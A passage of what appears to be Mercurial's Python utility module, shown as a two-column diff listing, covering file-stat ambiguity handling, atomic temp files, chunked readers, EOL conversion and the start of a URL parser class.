2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2439 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2440 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430
2441
2431 Case (*2) above means that a file was changed twice or more at
2442 Case (*2) above means that a file was changed twice or more at
2432 same time in sec (= S[n-1].ctime), and comparison of timestamp
2443 same time in sec (= S[n-1].ctime), and comparison of timestamp
2433 is ambiguous.
2444 is ambiguous.
2434
2445
2435 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2446 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2436 timestamp is ambiguous".
2447 timestamp is ambiguous".
2437
2448
2438 But advancing mtime only in case (*2) doesn't work as
2449 But advancing mtime only in case (*2) doesn't work as
2439 expected, because naturally advanced S[n].mtime in case (*1)
2450 expected, because naturally advanced S[n].mtime in case (*1)
2440 might be equal to manually advanced S[n-1 or earlier].mtime.
2451 might be equal to manually advanced S[n-1 or earlier].mtime.
2441
2452
2442 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2453 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2443 treated as ambiguous regardless of mtime, to avoid overlooking
2454 treated as ambiguous regardless of mtime, to avoid overlooking
2444 by confliction between such mtime.
2455 by confliction between such mtime.
2445
2456
2446 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2457 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2447 S[n].mtime", even if size of a file isn't changed.
2458 S[n].mtime", even if size of a file isn't changed.
2448 """
2459 """
2449 try:
2460 try:
2450 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2461 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2451 except AttributeError:
2462 except AttributeError:
2452 return False
2463 return False
2453
2464
2454 def avoidambig(self, path, old):
2465 def avoidambig(self, path, old):
2455 """Change file stat of specified path to avoid ambiguity
2466 """Change file stat of specified path to avoid ambiguity
2456
2467
2457 'old' should be previous filestat of 'path'.
2468 'old' should be previous filestat of 'path'.
2458
2469
2459 This skips avoiding ambiguity, if a process doesn't have
2470 This skips avoiding ambiguity, if a process doesn't have
2460 appropriate privileges for 'path'. This returns False in this
2471 appropriate privileges for 'path'. This returns False in this
2461 case.
2472 case.
2462
2473
2463 Otherwise, this returns True, as "ambiguity is avoided".
2474 Otherwise, this returns True, as "ambiguity is avoided".
2464 """
2475 """
2465 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2476 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2466 try:
2477 try:
2467 os.utime(path, (advanced, advanced))
2478 os.utime(path, (advanced, advanced))
2468 except OSError as inst:
2479 except OSError as inst:
2469 if inst.errno == errno.EPERM:
2480 if inst.errno == errno.EPERM:
2470 # utime() on the file created by another user causes EPERM,
2481 # utime() on the file created by another user causes EPERM,
2471 # if a process doesn't have appropriate privileges
2482 # if a process doesn't have appropriate privileges
2472 return False
2483 return False
2473 raise
2484 raise
2474 return True
2485 return True
2475
2486
2476 def __ne__(self, other):
2487 def __ne__(self, other):
2477 return not self == other
2488 return not self == other
2478
2489
2479
2490
2480 class atomictempfile(object):
2491 class atomictempfile(object):
2481 """writable file object that atomically updates a file
2492 """writable file object that atomically updates a file
2482
2493
2483 All writes will go to a temporary copy of the original file. Call
2494 All writes will go to a temporary copy of the original file. Call
2484 close() when you are done writing, and atomictempfile will rename
2495 close() when you are done writing, and atomictempfile will rename
2485 the temporary copy to the original name, making the changes
2496 the temporary copy to the original name, making the changes
2486 visible. If the object is destroyed without being closed, all your
2497 visible. If the object is destroyed without being closed, all your
2487 writes are discarded.
2498 writes are discarded.
2488
2499
2489 checkambig argument of constructor is used with filestat, and is
2500 checkambig argument of constructor is used with filestat, and is
2490 useful only if target file is guarded by any lock (e.g. repo.lock
2501 useful only if target file is guarded by any lock (e.g. repo.lock
2491 or repo.wlock).
2502 or repo.wlock).
2492 """
2503 """
2493
2504
2494 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2505 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2495 self.__name = name # permanent name
2506 self.__name = name # permanent name
2496 self._tempname = mktempcopy(
2507 self._tempname = mktempcopy(
2497 name,
2508 name,
2498 emptyok=(b'w' in mode),
2509 emptyok=(b'w' in mode),
2499 createmode=createmode,
2510 createmode=createmode,
2500 enforcewritable=(b'w' in mode),
2511 enforcewritable=(b'w' in mode),
2501 )
2512 )
2502
2513
2503 self._fp = posixfile(self._tempname, mode)
2514 self._fp = posixfile(self._tempname, mode)
2504 self._checkambig = checkambig
2515 self._checkambig = checkambig
2505
2516
2506 # delegated methods
2517 # delegated methods
2507 self.read = self._fp.read
2518 self.read = self._fp.read
2508 self.write = self._fp.write
2519 self.write = self._fp.write
2509 self.seek = self._fp.seek
2520 self.seek = self._fp.seek
2510 self.tell = self._fp.tell
2521 self.tell = self._fp.tell
2511 self.fileno = self._fp.fileno
2522 self.fileno = self._fp.fileno
2512
2523
2513 def close(self):
2524 def close(self):
2514 if not self._fp.closed:
2525 if not self._fp.closed:
2515 self._fp.close()
2526 self._fp.close()
2516 filename = localpath(self.__name)
2527 filename = localpath(self.__name)
2517 oldstat = self._checkambig and filestat.frompath(filename)
2528 oldstat = self._checkambig and filestat.frompath(filename)
2518 if oldstat and oldstat.stat:
2529 if oldstat and oldstat.stat:
2519 rename(self._tempname, filename)
2530 rename(self._tempname, filename)
2520 newstat = filestat.frompath(filename)
2531 newstat = filestat.frompath(filename)
2521 if newstat.isambig(oldstat):
2532 if newstat.isambig(oldstat):
2522 # stat of changed file is ambiguous to original one
2533 # stat of changed file is ambiguous to original one
2523 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2534 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2524 os.utime(filename, (advanced, advanced))
2535 os.utime(filename, (advanced, advanced))
2525 else:
2536 else:
2526 rename(self._tempname, filename)
2537 rename(self._tempname, filename)
2527
2538
2528 def discard(self):
2539 def discard(self):
2529 if not self._fp.closed:
2540 if not self._fp.closed:
2530 try:
2541 try:
2531 os.unlink(self._tempname)
2542 os.unlink(self._tempname)
2532 except OSError:
2543 except OSError:
2533 pass
2544 pass
2534 self._fp.close()
2545 self._fp.close()
2535
2546
2536 def __del__(self):
2547 def __del__(self):
2537 if safehasattr(self, '_fp'): # constructor actually did something
2548 if safehasattr(self, '_fp'): # constructor actually did something
2538 self.discard()
2549 self.discard()
2539
2550
2540 def __enter__(self):
2551 def __enter__(self):
2541 return self
2552 return self
2542
2553
2543 def __exit__(self, exctype, excvalue, traceback):
2554 def __exit__(self, exctype, excvalue, traceback):
2544 if exctype is not None:
2555 if exctype is not None:
2545 self.discard()
2556 self.discard()
2546 else:
2557 else:
2547 self.close()
2558 self.close()
2548
2559
2549
2560
2550 def unlinkpath(f, ignoremissing=False, rmdir=True):
2561 def unlinkpath(f, ignoremissing=False, rmdir=True):
2551 # type: (bytes, bool, bool) -> None
2562 # type: (bytes, bool, bool) -> None
2552 """unlink and remove the directory if it is empty"""
2563 """unlink and remove the directory if it is empty"""
2553 if ignoremissing:
2564 if ignoremissing:
2554 tryunlink(f)
2565 tryunlink(f)
2555 else:
2566 else:
2556 unlink(f)
2567 unlink(f)
2557 if rmdir:
2568 if rmdir:
2558 # try removing directories that might now be empty
2569 # try removing directories that might now be empty
2559 try:
2570 try:
2560 removedirs(os.path.dirname(f))
2571 removedirs(os.path.dirname(f))
2561 except OSError:
2572 except OSError:
2562 pass
2573 pass
2563
2574
2564
2575
2565 def tryunlink(f):
2576 def tryunlink(f):
2566 # type: (bytes) -> None
2577 # type: (bytes) -> None
2567 """Attempt to remove a file, ignoring ENOENT errors."""
2578 """Attempt to remove a file, ignoring ENOENT errors."""
2568 try:
2579 try:
2569 unlink(f)
2580 unlink(f)
2570 except OSError as e:
2581 except OSError as e:
2571 if e.errno != errno.ENOENT:
2582 if e.errno != errno.ENOENT:
2572 raise
2583 raise
2573
2584
2574
2585
2575 def makedirs(name, mode=None, notindexed=False):
2586 def makedirs(name, mode=None, notindexed=False):
2576 # type: (bytes, Optional[int], bool) -> None
2587 # type: (bytes, Optional[int], bool) -> None
2577 """recursive directory creation with parent mode inheritance
2588 """recursive directory creation with parent mode inheritance
2578
2589
2579 Newly created directories are marked as "not to be indexed by
2590 Newly created directories are marked as "not to be indexed by
2580 the content indexing service", if ``notindexed`` is specified
2591 the content indexing service", if ``notindexed`` is specified
2581 for "write" mode access.
2592 for "write" mode access.
2582 """
2593 """
2583 try:
2594 try:
2584 makedir(name, notindexed)
2595 makedir(name, notindexed)
2585 except OSError as err:
2596 except OSError as err:
2586 if err.errno == errno.EEXIST:
2597 if err.errno == errno.EEXIST:
2587 return
2598 return
2588 if err.errno != errno.ENOENT or not name:
2599 if err.errno != errno.ENOENT or not name:
2589 raise
2600 raise
2590 parent = os.path.dirname(os.path.abspath(name))
2601 parent = os.path.dirname(os.path.abspath(name))
2591 if parent == name:
2602 if parent == name:
2592 raise
2603 raise
2593 makedirs(parent, mode, notindexed)
2604 makedirs(parent, mode, notindexed)
2594 try:
2605 try:
2595 makedir(name, notindexed)
2606 makedir(name, notindexed)
2596 except OSError as err:
2607 except OSError as err:
2597 # Catch EEXIST to handle races
2608 # Catch EEXIST to handle races
2598 if err.errno == errno.EEXIST:
2609 if err.errno == errno.EEXIST:
2599 return
2610 return
2600 raise
2611 raise
2601 if mode is not None:
2612 if mode is not None:
2602 os.chmod(name, mode)
2613 os.chmod(name, mode)
2603
2614
2604
2615
2605 def readfile(path):
2616 def readfile(path):
2606 # type: (bytes) -> bytes
2617 # type: (bytes) -> bytes
2607 with open(path, b'rb') as fp:
2618 with open(path, b'rb') as fp:
2608 return fp.read()
2619 return fp.read()
2609
2620
2610
2621
2611 def writefile(path, text):
2622 def writefile(path, text):
2612 # type: (bytes, bytes) -> None
2623 # type: (bytes, bytes) -> None
2613 with open(path, b'wb') as fp:
2624 with open(path, b'wb') as fp:
2614 fp.write(text)
2625 fp.write(text)
2615
2626
2616
2627
2617 def appendfile(path, text):
2628 def appendfile(path, text):
2618 # type: (bytes, bytes) -> None
2629 # type: (bytes, bytes) -> None
2619 with open(path, b'ab') as fp:
2630 with open(path, b'ab') as fp:
2620 fp.write(text)
2631 fp.write(text)
2621
2632
2622
2633
2623 class chunkbuffer(object):
2634 class chunkbuffer(object):
2624 """Allow arbitrary sized chunks of data to be efficiently read from an
2635 """Allow arbitrary sized chunks of data to be efficiently read from an
2625 iterator over chunks of arbitrary size."""
2636 iterator over chunks of arbitrary size."""
2626
2637
2627 def __init__(self, in_iter):
2638 def __init__(self, in_iter):
2628 """in_iter is the iterator that's iterating over the input chunks."""
2639 """in_iter is the iterator that's iterating over the input chunks."""
2629
2640
2630 def splitbig(chunks):
2641 def splitbig(chunks):
2631 for chunk in chunks:
2642 for chunk in chunks:
2632 if len(chunk) > 2 ** 20:
2643 if len(chunk) > 2 ** 20:
2633 pos = 0
2644 pos = 0
2634 while pos < len(chunk):
2645 while pos < len(chunk):
2635 end = pos + 2 ** 18
2646 end = pos + 2 ** 18
2636 yield chunk[pos:end]
2647 yield chunk[pos:end]
2637 pos = end
2648 pos = end
2638 else:
2649 else:
2639 yield chunk
2650 yield chunk
2640
2651
2641 self.iter = splitbig(in_iter)
2652 self.iter = splitbig(in_iter)
2642 self._queue = collections.deque()
2653 self._queue = collections.deque()
2643 self._chunkoffset = 0
2654 self._chunkoffset = 0
2644
2655
2645 def read(self, l=None):
2656 def read(self, l=None):
2646 """Read L bytes of data from the iterator of chunks of data.
2657 """Read L bytes of data from the iterator of chunks of data.
2647 Returns less than L bytes if the iterator runs dry.
2658 Returns less than L bytes if the iterator runs dry.
2648
2659
2649 If size parameter is omitted, read everything"""
2660 If size parameter is omitted, read everything"""
2650 if l is None:
2661 if l is None:
2651 return b''.join(self.iter)
2662 return b''.join(self.iter)
2652
2663
2653 left = l
2664 left = l
2654 buf = []
2665 buf = []
2655 queue = self._queue
2666 queue = self._queue
2656 while left > 0:
2667 while left > 0:
2657 # refill the queue
2668 # refill the queue
2658 if not queue:
2669 if not queue:
2659 target = 2 ** 18
2670 target = 2 ** 18
2660 for chunk in self.iter:
2671 for chunk in self.iter:
2661 queue.append(chunk)
2672 queue.append(chunk)
2662 target -= len(chunk)
2673 target -= len(chunk)
2663 if target <= 0:
2674 if target <= 0:
2664 break
2675 break
2665 if not queue:
2676 if not queue:
2666 break
2677 break
2667
2678
2668 # The easy way to do this would be to queue.popleft(), modify the
2679 # The easy way to do this would be to queue.popleft(), modify the
2669 # chunk (if necessary), then queue.appendleft(). However, for cases
2680 # chunk (if necessary), then queue.appendleft(). However, for cases
2670 # where we read partial chunk content, this incurs 2 dequeue
2681 # where we read partial chunk content, this incurs 2 dequeue
2671 # mutations and creates a new str for the remaining chunk in the
2682 # mutations and creates a new str for the remaining chunk in the
2672 # queue. Our code below avoids this overhead.
2683 # queue. Our code below avoids this overhead.
2673
2684
2674 chunk = queue[0]
2685 chunk = queue[0]
2675 chunkl = len(chunk)
2686 chunkl = len(chunk)
2676 offset = self._chunkoffset
2687 offset = self._chunkoffset
2677
2688
2678 # Use full chunk.
2689 # Use full chunk.
2679 if offset == 0 and left >= chunkl:
2690 if offset == 0 and left >= chunkl:
2680 left -= chunkl
2691 left -= chunkl
2681 queue.popleft()
2692 queue.popleft()
2682 buf.append(chunk)
2693 buf.append(chunk)
2683 # self._chunkoffset remains at 0.
2694 # self._chunkoffset remains at 0.
2684 continue
2695 continue
2685
2696
2686 chunkremaining = chunkl - offset
2697 chunkremaining = chunkl - offset
2687
2698
2688 # Use all of unconsumed part of chunk.
2699 # Use all of unconsumed part of chunk.
2689 if left >= chunkremaining:
2700 if left >= chunkremaining:
2690 left -= chunkremaining
2701 left -= chunkremaining
2691 queue.popleft()
2702 queue.popleft()
2692 # offset == 0 is enabled by block above, so this won't merely
2703 # offset == 0 is enabled by block above, so this won't merely
2693 # copy via ``chunk[0:]``.
2704 # copy via ``chunk[0:]``.
2694 buf.append(chunk[offset:])
2705 buf.append(chunk[offset:])
2695 self._chunkoffset = 0
2706 self._chunkoffset = 0
2696
2707
2697 # Partial chunk needed.
2708 # Partial chunk needed.
2698 else:
2709 else:
2699 buf.append(chunk[offset : offset + left])
2710 buf.append(chunk[offset : offset + left])
2700 self._chunkoffset += left
2711 self._chunkoffset += left
2701 left -= chunkremaining
2712 left -= chunkremaining
2702
2713
2703 return b''.join(buf)
2714 return b''.join(buf)
2704
2715
2705
2716
2706 def filechunkiter(f, size=131072, limit=None):
2717 def filechunkiter(f, size=131072, limit=None):
2707 """Create a generator that produces the data in the file size
2718 """Create a generator that produces the data in the file size
2708 (default 131072) bytes at a time, up to optional limit (default is
2719 (default 131072) bytes at a time, up to optional limit (default is
2709 to read all data). Chunks may be less than size bytes if the
2720 to read all data). Chunks may be less than size bytes if the
2710 chunk is the last chunk in the file, or the file is a socket or
2721 chunk is the last chunk in the file, or the file is a socket or
2711 some other type of file that sometimes reads less data than is
2722 some other type of file that sometimes reads less data than is
2712 requested."""
2723 requested."""
2713 assert size >= 0
2724 assert size >= 0
2714 assert limit is None or limit >= 0
2725 assert limit is None or limit >= 0
2715 while True:
2726 while True:
2716 if limit is None:
2727 if limit is None:
2717 nbytes = size
2728 nbytes = size
2718 else:
2729 else:
2719 nbytes = min(limit, size)
2730 nbytes = min(limit, size)
2720 s = nbytes and f.read(nbytes)
2731 s = nbytes and f.read(nbytes)
2721 if not s:
2732 if not s:
2722 break
2733 break
2723 if limit:
2734 if limit:
2724 limit -= len(s)
2735 limit -= len(s)
2725 yield s
2736 yield s
2726
2737
2727
2738
2728 class cappedreader(object):
2739 class cappedreader(object):
2729 """A file object proxy that allows reading up to N bytes.
2740 """A file object proxy that allows reading up to N bytes.
2730
2741
2731 Given a source file object, instances of this type allow reading up to
2742 Given a source file object, instances of this type allow reading up to
2732 N bytes from that source file object. Attempts to read past the allowed
2743 N bytes from that source file object. Attempts to read past the allowed
2733 limit are treated as EOF.
2744 limit are treated as EOF.
2734
2745
2735 It is assumed that I/O is not performed on the original file object
2746 It is assumed that I/O is not performed on the original file object
2736 in addition to I/O that is performed by this instance. If there is,
2747 in addition to I/O that is performed by this instance. If there is,
2737 state tracking will get out of sync and unexpected results will ensue.
2748 state tracking will get out of sync and unexpected results will ensue.
2738 """
2749 """
2739
2750
2740 def __init__(self, fh, limit):
2751 def __init__(self, fh, limit):
2741 """Allow reading up to <limit> bytes from <fh>."""
2752 """Allow reading up to <limit> bytes from <fh>."""
2742 self._fh = fh
2753 self._fh = fh
2743 self._left = limit
2754 self._left = limit
2744
2755
2745 def read(self, n=-1):
2756 def read(self, n=-1):
2746 if not self._left:
2757 if not self._left:
2747 return b''
2758 return b''
2748
2759
2749 if n < 0:
2760 if n < 0:
2750 n = self._left
2761 n = self._left
2751
2762
2752 data = self._fh.read(min(n, self._left))
2763 data = self._fh.read(min(n, self._left))
2753 self._left -= len(data)
2764 self._left -= len(data)
2754 assert self._left >= 0
2765 assert self._left >= 0
2755
2766
2756 return data
2767 return data
2757
2768
2758 def readinto(self, b):
2769 def readinto(self, b):
2759 res = self.read(len(b))
2770 res = self.read(len(b))
2760 if res is None:
2771 if res is None:
2761 return None
2772 return None
2762
2773
2763 b[0 : len(res)] = res
2774 b[0 : len(res)] = res
2764 return len(res)
2775 return len(res)
2765
2776
2766
2777
2767 def unitcountfn(*unittable):
2778 def unitcountfn(*unittable):
2768 '''return a function that renders a readable count of some quantity'''
2779 '''return a function that renders a readable count of some quantity'''
2769
2780
2770 def go(count):
2781 def go(count):
2771 for multiplier, divisor, format in unittable:
2782 for multiplier, divisor, format in unittable:
2772 if abs(count) >= divisor * multiplier:
2783 if abs(count) >= divisor * multiplier:
2773 return format % (count / float(divisor))
2784 return format % (count / float(divisor))
2774 return unittable[-1][2] % count
2785 return unittable[-1][2] % count
2775
2786
2776 return go
2787 return go
2777
2788
2778
2789
2779 def processlinerange(fromline, toline):
2790 def processlinerange(fromline, toline):
2780 # type: (int, int) -> Tuple[int, int]
2791 # type: (int, int) -> Tuple[int, int]
2781 """Check that linerange <fromline>:<toline> makes sense and return a
2792 """Check that linerange <fromline>:<toline> makes sense and return a
2782 0-based range.
2793 0-based range.
2783
2794
2784 >>> processlinerange(10, 20)
2795 >>> processlinerange(10, 20)
2785 (9, 20)
2796 (9, 20)
2786 >>> processlinerange(2, 1)
2797 >>> processlinerange(2, 1)
2787 Traceback (most recent call last):
2798 Traceback (most recent call last):
2788 ...
2799 ...
2789 ParseError: line range must be positive
2800 ParseError: line range must be positive
2790 >>> processlinerange(0, 5)
2801 >>> processlinerange(0, 5)
2791 Traceback (most recent call last):
2802 Traceback (most recent call last):
2792 ...
2803 ...
2793 ParseError: fromline must be strictly positive
2804 ParseError: fromline must be strictly positive
2794 """
2805 """
2795 if toline - fromline < 0:
2806 if toline - fromline < 0:
2796 raise error.ParseError(_(b"line range must be positive"))
2807 raise error.ParseError(_(b"line range must be positive"))
2797 if fromline < 1:
2808 if fromline < 1:
2798 raise error.ParseError(_(b"fromline must be strictly positive"))
2809 raise error.ParseError(_(b"fromline must be strictly positive"))
2799 return fromline - 1, toline
2810 return fromline - 1, toline
2800
2811
2801
2812
2802 bytecount = unitcountfn(
2813 bytecount = unitcountfn(
2803 (100, 1 << 30, _(b'%.0f GB')),
2814 (100, 1 << 30, _(b'%.0f GB')),
2804 (10, 1 << 30, _(b'%.1f GB')),
2815 (10, 1 << 30, _(b'%.1f GB')),
2805 (1, 1 << 30, _(b'%.2f GB')),
2816 (1, 1 << 30, _(b'%.2f GB')),
2806 (100, 1 << 20, _(b'%.0f MB')),
2817 (100, 1 << 20, _(b'%.0f MB')),
2807 (10, 1 << 20, _(b'%.1f MB')),
2818 (10, 1 << 20, _(b'%.1f MB')),
2808 (1, 1 << 20, _(b'%.2f MB')),
2819 (1, 1 << 20, _(b'%.2f MB')),
2809 (100, 1 << 10, _(b'%.0f KB')),
2820 (100, 1 << 10, _(b'%.0f KB')),
2810 (10, 1 << 10, _(b'%.1f KB')),
2821 (10, 1 << 10, _(b'%.1f KB')),
2811 (1, 1 << 10, _(b'%.2f KB')),
2822 (1, 1 << 10, _(b'%.2f KB')),
2812 (1, 1, _(b'%.0f bytes')),
2823 (1, 1, _(b'%.0f bytes')),
2813 )
2824 )
2814
2825
2815
2826
2816 class transformingwriter(object):
2827 class transformingwriter(object):
2817 """Writable file wrapper to transform data by function"""
2828 """Writable file wrapper to transform data by function"""
2818
2829
2819 def __init__(self, fp, encode):
2830 def __init__(self, fp, encode):
2820 self._fp = fp
2831 self._fp = fp
2821 self._encode = encode
2832 self._encode = encode
2822
2833
2823 def close(self):
2834 def close(self):
2824 self._fp.close()
2835 self._fp.close()
2825
2836
2826 def flush(self):
2837 def flush(self):
2827 self._fp.flush()
2838 self._fp.flush()
2828
2839
2829 def write(self, data):
2840 def write(self, data):
2830 return self._fp.write(self._encode(data))
2841 return self._fp.write(self._encode(data))
2831
2842
2832
2843
2833 # Matches a single EOL which can either be a CRLF where repeated CR
2844 # Matches a single EOL which can either be a CRLF where repeated CR
2834 # are removed or a LF. We do not care about old Macintosh files, so a
2845 # are removed or a LF. We do not care about old Macintosh files, so a
2835 # stray CR is an error.
2846 # stray CR is an error.
2836 _eolre = remod.compile(br'\r*\n')
2847 _eolre = remod.compile(br'\r*\n')
2837
2848
2838
2849
2839 def tolf(s):
2850 def tolf(s):
2840 # type: (bytes) -> bytes
2851 # type: (bytes) -> bytes
2841 return _eolre.sub(b'\n', s)
2852 return _eolre.sub(b'\n', s)
2842
2853
2843
2854
2844 def tocrlf(s):
2855 def tocrlf(s):
2845 # type: (bytes) -> bytes
2856 # type: (bytes) -> bytes
2846 return _eolre.sub(b'\r\n', s)
2857 return _eolre.sub(b'\r\n', s)
2847
2858
2848
2859
2849 def _crlfwriter(fp):
2860 def _crlfwriter(fp):
2850 return transformingwriter(fp, tocrlf)
2861 return transformingwriter(fp, tocrlf)
2851
2862
2852
2863
2853 if pycompat.oslinesep == b'\r\n':
2864 if pycompat.oslinesep == b'\r\n':
2854 tonativeeol = tocrlf
2865 tonativeeol = tocrlf
2855 fromnativeeol = tolf
2866 fromnativeeol = tolf
2856 nativeeolwriter = _crlfwriter
2867 nativeeolwriter = _crlfwriter
2857 else:
2868 else:
2858 tonativeeol = pycompat.identity
2869 tonativeeol = pycompat.identity
2859 fromnativeeol = pycompat.identity
2870 fromnativeeol = pycompat.identity
2860 nativeeolwriter = pycompat.identity
2871 nativeeolwriter = pycompat.identity
2861
2872
2862 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2873 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2863 3,
2874 3,
2864 0,
2875 0,
2865 ):
2876 ):
2866 # There is an issue in CPython that some IO methods do not handle EINTR
2877 # There is an issue in CPython that some IO methods do not handle EINTR
2867 # correctly. The following table shows what CPython version (and functions)
2878 # correctly. The following table shows what CPython version (and functions)
2868 # are affected (buggy: has the EINTR bug, okay: otherwise):
2879 # are affected (buggy: has the EINTR bug, okay: otherwise):
2869 #
2880 #
2870 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2881 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2871 # --------------------------------------------------
2882 # --------------------------------------------------
2872 # fp.__iter__ | buggy | buggy | okay
2883 # fp.__iter__ | buggy | buggy | okay
2873 # fp.read* | buggy | okay [1] | okay
2884 # fp.read* | buggy | okay [1] | okay
2874 #
2885 #
2875 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2886 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2876 #
2887 #
2877 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2888 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2878 # like "read*" work fine, as we do not support Python < 2.7.4.
2889 # like "read*" work fine, as we do not support Python < 2.7.4.
2879 #
2890 #
2880 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2891 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2881 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2892 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2882 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2893 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2883 # fp.__iter__ but not other fp.read* methods.
2894 # fp.__iter__ but not other fp.read* methods.
2884 #
2895 #
2885 # On modern systems like Linux, the "read" syscall cannot be interrupted
2896 # On modern systems like Linux, the "read" syscall cannot be interrupted
2886 # when reading "fast" files like on-disk files. So the EINTR issue only
2897 # when reading "fast" files like on-disk files. So the EINTR issue only
2887 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2898 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2888 # files approximately as "fast" files and use the fast (unsafe) code path,
2899 # files approximately as "fast" files and use the fast (unsafe) code path,
2889 # to minimize the performance impact.
2900 # to minimize the performance impact.
2890
2901
2891 def iterfile(fp):
2902 def iterfile(fp):
2892 fastpath = True
2903 fastpath = True
2893 if type(fp) is file:
2904 if type(fp) is file:
2894 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2905 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2895 if fastpath:
2906 if fastpath:
2896 return fp
2907 return fp
2897 else:
2908 else:
2898 # fp.readline deals with EINTR correctly, use it as a workaround.
2909 # fp.readline deals with EINTR correctly, use it as a workaround.
2899 return iter(fp.readline, b'')
2910 return iter(fp.readline, b'')
2900
2911
2901
2912
2902 else:
2913 else:
2903 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2914 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2904 def iterfile(fp):
2915 def iterfile(fp):
2905 return fp
2916 return fp
2906
2917
2907
2918
2908 def iterlines(iterator):
2919 def iterlines(iterator):
2909 # type: (Iterator[bytes]) -> Iterator[bytes]
2920 # type: (Iterator[bytes]) -> Iterator[bytes]
2910 for chunk in iterator:
2921 for chunk in iterator:
2911 for line in chunk.splitlines():
2922 for line in chunk.splitlines():
2912 yield line
2923 yield line
2913
2924
2914
2925
2915 def expandpath(path):
2926 def expandpath(path):
2916 # type: (bytes) -> bytes
2927 # type: (bytes) -> bytes
2917 return os.path.expanduser(os.path.expandvars(path))
2928 return os.path.expanduser(os.path.expandvars(path))
2918
2929
2919
2930
2920 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2931 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2921 """Return the result of interpolating items in the mapping into string s.
2932 """Return the result of interpolating items in the mapping into string s.
2922
2933
2923 prefix is a single character string, or a two character string with
2934 prefix is a single character string, or a two character string with
2924 a backslash as the first character if the prefix needs to be escaped in
2935 a backslash as the first character if the prefix needs to be escaped in
2925 a regular expression.
2936 a regular expression.
2926
2937
2927 fn is an optional function that will be applied to the replacement text
2938 fn is an optional function that will be applied to the replacement text
2928 just before replacement.
2939 just before replacement.
2929
2940
2930 escape_prefix is an optional flag that allows using doubled prefix for
2941 escape_prefix is an optional flag that allows using doubled prefix for
2931 its escaping.
2942 its escaping.
2932 """
2943 """
2933 fn = fn or (lambda s: s)
2944 fn = fn or (lambda s: s)
2934 patterns = b'|'.join(mapping.keys())
2945 patterns = b'|'.join(mapping.keys())
2935 if escape_prefix:
2946 if escape_prefix:
2936 patterns += b'|' + prefix
2947 patterns += b'|' + prefix
2937 if len(prefix) > 1:
2948 if len(prefix) > 1:
2938 prefix_char = prefix[1:]
2949 prefix_char = prefix[1:]
2939 else:
2950 else:
2940 prefix_char = prefix
2951 prefix_char = prefix
2941 mapping[prefix_char] = prefix_char
2952 mapping[prefix_char] = prefix_char
2942 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2953 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2954 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944
2955
2945
2956
2946 def getport(port):
2957 def getport(port):
2947 # type: (Union[bytes, int]) -> int
2958 # type: (Union[bytes, int]) -> int
2948 """Return the port for a given network service.
2959 """Return the port for a given network service.
2949
2960
2950 If port is an integer, it's returned as is. If it's a string, it's
2961 If port is an integer, it's returned as is. If it's a string, it's
2951 looked up using socket.getservbyname(). If there's no matching
2962 looked up using socket.getservbyname(). If there's no matching
2952 service, error.Abort is raised.
2963 service, error.Abort is raised.
2953 """
2964 """
2954 try:
2965 try:
2955 return int(port)
2966 return int(port)
2956 except ValueError:
2967 except ValueError:
2957 pass
2968 pass
2958
2969
2959 try:
2970 try:
2960 return socket.getservbyname(pycompat.sysstr(port))
2971 return socket.getservbyname(pycompat.sysstr(port))
2961 except socket.error:
2972 except socket.error:
2962 raise error.Abort(
2973 raise error.Abort(
2963 _(b"no port number associated with service '%s'") % port
2974 _(b"no port number associated with service '%s'") % port
2964 )
2975 )
2965
2976
2966
2977
2967 class url(object):
2978 class url(object):
2968 r"""Reliable URL parser.
2979 r"""Reliable URL parser.
2969
2980
2970 This parses URLs and provides attributes for the following
2981 This parses URLs and provides attributes for the following
2971 components:
2982 components:
2972
2983
2973 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2984 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974
2985
2975 Missing components are set to None. The only exception is
2986 Missing components are set to None. The only exception is
